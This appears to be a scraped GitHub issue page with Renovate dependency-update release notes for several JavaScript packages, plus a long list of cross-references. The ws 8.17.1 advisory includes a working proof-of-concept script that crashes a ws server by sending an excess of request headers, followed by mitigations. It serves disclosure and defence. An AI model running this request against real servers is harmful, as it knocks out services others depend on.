-   Update some dependencies ([`7c9b645`](https://togithub.com/webpro-nl/knip/commit/7c9b6455))
-   Update docs ([`1c9361f`](https://togithub.com/webpro-nl/knip/commit/1c9361f3))
-   Make TS-style path mappings work for all files with extensions ([#&#8203;673](https://togithub.com/webpro-nl/knip/issues/673)) ([`e9b3e66`](https://togithub.com/webpro-nl/knip/commit/e9b3e669))

</details>

<details>
<summary>tatethurston/nextjs-routes (nextjs-routes)</summary>

### [`v2.2.1`](https://togithub.com/tatethurston/nextjs-routes/blob/HEAD/CHANGELOG.md#221)

[Compare Source](https://togithub.com/tatethurston/nextjs-routes/compare/v2.2.0...v2.2.1)

-   Fix route generation on Windows. See [#&#8203;187](https://togithub.com/tatethurston/nextjs-routes/issues/187). Thanks [@&#8203;AkanoCA](https://togithub.com/AkanoCA)!

</details>

<details>
<summary>pnpm/pnpm (pnpm)</summary>

### [`v9.4.0`](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0)

[Compare Source](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0)

</details>

<details>
<summary>privatenumber/tsx (tsx)</summary>

### [`v4.15.6`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.6)

[Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.5...v4.15.6)

##### Bug Fixes

-   minimum Node version in warning for `module.register()` ([#&#8203;592](https://togithub.com/privatenumber/tsx/issues/592)) ([cb27d4d](https://togithub.com/privatenumber/tsx/commit/cb27d4dfe7670e6cf50f09b48cbd37ac73aa064a))

***

This release is also available on:

-   [npm package (@&#8203;latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.6)

### [`v4.15.5`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.5)

[Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.4...v4.15.5)

##### Bug Fixes

-   **cjs:** make transformers overwritable ([c22fa7d](https://togithub.com/privatenumber/tsx/commit/c22fa7d1a90fa34983caddda91b5c1c10e1a4b6c))

***

This release is also available on:

-   [npm package (@&#8203;latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.5)

</details>

<details>
<summary>sindresorhus/type-fest (type-fest)</summary>

### [`v4.20.1`](https://togithub.com/sindresorhus/type-fest/releases/tag/v4.20.1)

[Compare Source](https://togithub.com/sindresorhus/type-fest/compare/v4.20.0...v4.20.1)

-   `Schema`: Fix handling of arrays ([#&#8203;887](https://togithub.com/sindresorhus/type-fest/issues/887))  [`c570ec2`](https://togithub.com/sindresorhus/type-fest/commit/c570ec2)
-   `Paths`: Prevent infinite recursion ([#&#8203;891](https://togithub.com/sindresorhus/type-fest/issues/891))  [`7d4e875`](https://togithub.com/sindresorhus/type-fest/commit/7d4e875)

</details>

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "before 4am on Monday,before 4am on Thursday" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/weareinreach/TransMascFutures).



PR-URL: #436
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@ojengwa ojengwa mentioned this issue Jun 18, 2024
Closed
4 tasks
@PavelMor25 PavelMor25 mentioned this issue Jun 19, 2024
Open
1 task
@ajfisher ajfisher mentioned this issue Jun 19, 2024
Merged
MarcWils added a commit to MarcWils/VECOZO-OpenAPI that referenced this issue Jun 20, 2024
@MarcWils
Update ws to v7.5.10 (websockets/ws#2230)
e7b1b47
MarcWils added a commit to MarcWils/VECOZO-OpenAPI that referenced this issue Jun 20, 2024
@MarcWils
Update ws to v7.5.10 (websockets/ws#2230)
06e8565
@Knightplayzz Knightplayzz mentioned this issue Jun 21, 2024
Closed
@sinamics sinamics mentioned this issue Jun 21, 2024
Merged
@debricked debricked bot mentioned this issue Jun 22, 2024
Closed
@github-actions github-actions bot mentioned this issue Jun 22, 2024
Merged
1 task
@edamame-maru edamame-maru mentioned this issue Jun 23, 2024
Closed
@dmilin1 dmilin1 mentioned this issue Jun 24, 2024
Closed
chinthliss added a commit to chinthliss/MuckWebInterface that referenced this issue Jun 25, 2024
@chinthliss
build: Update dependencies to fix warning
14b3561 
In particular:
websockets/ws#2230
websockets/ws#2231
@pjc0702 pjc0702 mentioned this issue Jun 25, 2024
Merged
This was referenced Aug 15, 2024
Merged
Open
@tim2zg tim2zg mentioned this issue Aug 16, 2024
Merged
This was referenced Aug 21, 2024
Open
Open
@qdraw qdraw mentioned this issue Aug 25, 2024
Merged
@mtsammy40 mtsammy40 mentioned this issue Aug 29, 2024
Open
@TitiLaPierre TitiLaPierre mentioned this issue Sep 1, 2024
Merged
@ybiquitous ybiquitous mentioned this issue Sep 3, 2024
Merged
@X-oss-byte X-oss-byte mentioned this issue Sep 7, 2024
Open
@FaroukAmr FaroukAmr mentioned this issue Sep 8, 2024
Open
@rater193 rater193 mentioned this issue Sep 9, 2024
Open
@mauroavellaneda mauroavellaneda mentioned this issue Sep 9, 2024
Closed
This was referenced Sep 9, 2024
Open
Open
@organich organich mentioned this issue Sep 13, 2024
Open
@FaroukAmr FaroukAmr mentioned this issue Sep 14, 2024
Open
@Roseymr Roseymr mentioned this issue Sep 17, 2024
Open
@WontonSam WontonSam mentioned this issue Sep 18, 2024
Open
@X-oss-byte X-oss-byte mentioned this issue Sep 19, 2024
Open
@WontonSam WontonSam mentioned this issue Sep 19, 2024
Open
@FaroukAmr FaroukAmr mentioned this issue Sep 19, 2024
Open
@neznaamey neznaamey mentioned this issue Sep 21, 2024
Open
@FaroukAmr FaroukAmr mentioned this issue Sep 21, 2024
Open
@neznaamey neznaamey mentioned this issue Sep 22, 2024
Open
@snyk-io snyk-io bot mentioned this issue Sep 23, 2024
Open
@lirantal lirantal mentioned this issue Sep 30, 2024
Closed
@oji3000 oji3000 mentioned this issue Oct 2, 2024
Open
@Danielhay016 Danielhay016 mentioned this issue Oct 6, 2024
Open
@WontonSam WontonSam mentioned this issue Nov 2, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix crash when the Upgrade header cannot be read websockets/ws
2 participants
@lpinca @rrlapointe